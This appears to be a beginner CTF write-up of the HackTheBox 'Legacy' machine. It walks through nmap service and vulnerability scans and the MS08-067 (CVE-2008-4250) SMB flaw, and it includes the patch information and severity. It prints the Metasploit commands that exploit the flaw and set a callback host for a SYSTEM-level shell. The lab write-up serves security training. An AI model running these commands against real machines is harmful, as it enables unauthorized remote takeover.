Hands-On Windows SMB Exploitation: Unleashing the Legacy CTF Challenge
Table of Contents
ToggleLegacy
Legacy is a fairly straightforward beginner-level machine which demonstrates the potential security risks of SMB on Windows.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.
Service Enumeration
Behind Security performed an nmap scan on 10.10.10.4 and was able to identify that TCP ports 135, 139, and 445 are open.
Command: nmap -sV -sC -T4 10.10.10.4 -v -Pn
It is important to note the presence of the flag -Pn, indicating that nmap will not check if the host is up. This is particularly useful in this case, as the target machine is not responding to ICMP requests.
SMB Enumeration
Behind Security conducted an Nmap scan with specific vulnerability detection scripts from NSE (Nmap Scripting Engine). The command used for the scan was: nmap -sV –script=vuln -T4 10.10.10.4 -p135,139,445 -v -Pn, and the results are provided below.
Initial Access – Remote Code Execution (CVE-2008-4250)
Vulnerability Explanation: The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. The vulnerability was addressed as CVE-2008-4250 and more information can be found here.
Vulnerability Fix: Microsoft has released a patch to fix this known issue. You can see more information here.
Severity: Critical
Steps to Reproduce the Attack: There is a metasploit module publicly available to explore the vulnerability.
msf6> use exploit/windows/smb/ms08_067_netapi
msf6> set RHOSTS 10.10.10.4
msf6> set LHOST attacker-ip
msf6> set TARGET 6
msf6> run
Screenshot:
Post-Exploitation
The SMB server is running as SYSTEM, and a successful exploit would result in a remote attacker gaining administrative privileges on the machine.